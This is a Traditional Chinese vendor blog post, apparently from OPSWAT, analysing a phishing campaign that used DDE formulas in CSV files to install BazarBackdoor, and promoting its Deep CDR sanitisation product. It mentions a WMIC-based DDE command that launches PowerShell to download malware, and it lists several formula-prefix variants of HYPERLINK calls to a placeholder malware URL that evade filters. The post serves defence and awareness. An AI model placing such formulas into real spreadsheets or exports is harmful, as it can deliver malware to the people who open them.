2022 年 2 月,惡意軟體研究人員 Chris Campbell 發現了 一種新的網路釣魚活動 ,該活動使用特製的 CSV(逗號分隔值)文本檔,用 BazarBackdoor 木馬感染用戶的設備。在這篇博文中,我們分析了攻擊場景,並向您展示了如何使用 Deep CDR(檔案無毒化) 防止這種複雜的攻擊
(內容解除武裝和重建)。
攻擊策略
在這次網路釣魚活動中,網路犯罪分子利用了一個 CSV 檔——一個帶分隔符的文字檔,它以表格格式儲存資料並使用逗號分隔值。此檔案類型是在資料庫和應用程式之間交換簡單資料的常用方法。由於CSV檔僅包含沒有可執行代碼的文本,因此許多用戶認為它是無害的,並且無需謹慎即可迅速打開檔案。他們不懷疑該檔案可能是威脅媒介,如果使用支援動態資料交換 (DDE) 的應用程式(如 Microsoft Excel 和 OpenOffice Calc)打開 CSV 檔,惡意軟體可以透過該威脅媒介進入他們的設備。這些應用程式可以執行 CSV 檔案中的公式和函數。威脅作者濫用此 DDE 功能來執行任意命令,這些命令下載並安裝BazarBackdoor特洛伊木馬,以破壞並從粗心的受害者的設備獲得對公司網路的完全存取許可權。與隱藏在 MS Office 檔案中的惡意巨集或 VBA 代碼的流行攻擊方法相比,隱藏在 DDE 檔案中的威脅更難檢測。
仔細檢查檔案,我們可以看到 =WmiC|命令(Windows 管理介面命令)包含在其中一列資料中。如果受害者無意中允許此 DDE 函數運行,它將創建一個 PowerShell 命令。然後,這些命令將打開一個遠端 URL 以下載 BazarLoader,並且 BazarBackdoor 將安裝在受害者的機器上。
Deep CDR(檔案無毒化) 如何幫助您防禦 DDE 攻擊
您可以透過在電子郵件中附加的檔到達您的使用者之前對其進行清理來保護您的網路免受這些複雜的網路釣魚活動的侵害。Deep CDR 認為每個檔都存在潛在威脅,並專注於預防而不僅僅是檢測,因此在保持相同的檔可用性和功能的同時,剝離了檔案中的所有活動內容。深度CDR是六大關鍵技術之一 MetaDefender - OPSWAT真正體現零信任理念的高階威脅防禦平臺。
以下是我們處理受感染的 CSV 檔後的清理詳細資訊 MetaDefender Core (您也可以參考掃描 結果 上 MetaDefender Cloud).Deep CDR 中和了檔案中的公式,因此沒有創建 PowerShell 命令。然後無法下載惡意軟體。
在類似的攻擊中,威脅作者使用更複雜的公式來逃避檢測。通常,MS Excel 中的公式以等號 (=) 開頭。但是,由於此應用程式還接受以不同符號開頭的公式,例如“=+”或“@”,而不僅僅是“=”,因此 CSV 檔案中的破壞性公式可以是:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
這些類型的公式可以逃避一些常見的 CDR 系統。但是,Deep CDR 可以輕鬆處理這種策略並輸出乾淨、安全使用的檔案,從而消除威脅。
了解有關 Deep CDR 的更多資訊或 與 OPSWAT 技術專家 ,探索最佳安全解決方案,保護您的企業網路和使用者免受零時差攻擊和高階規避惡意軟體的侵害。
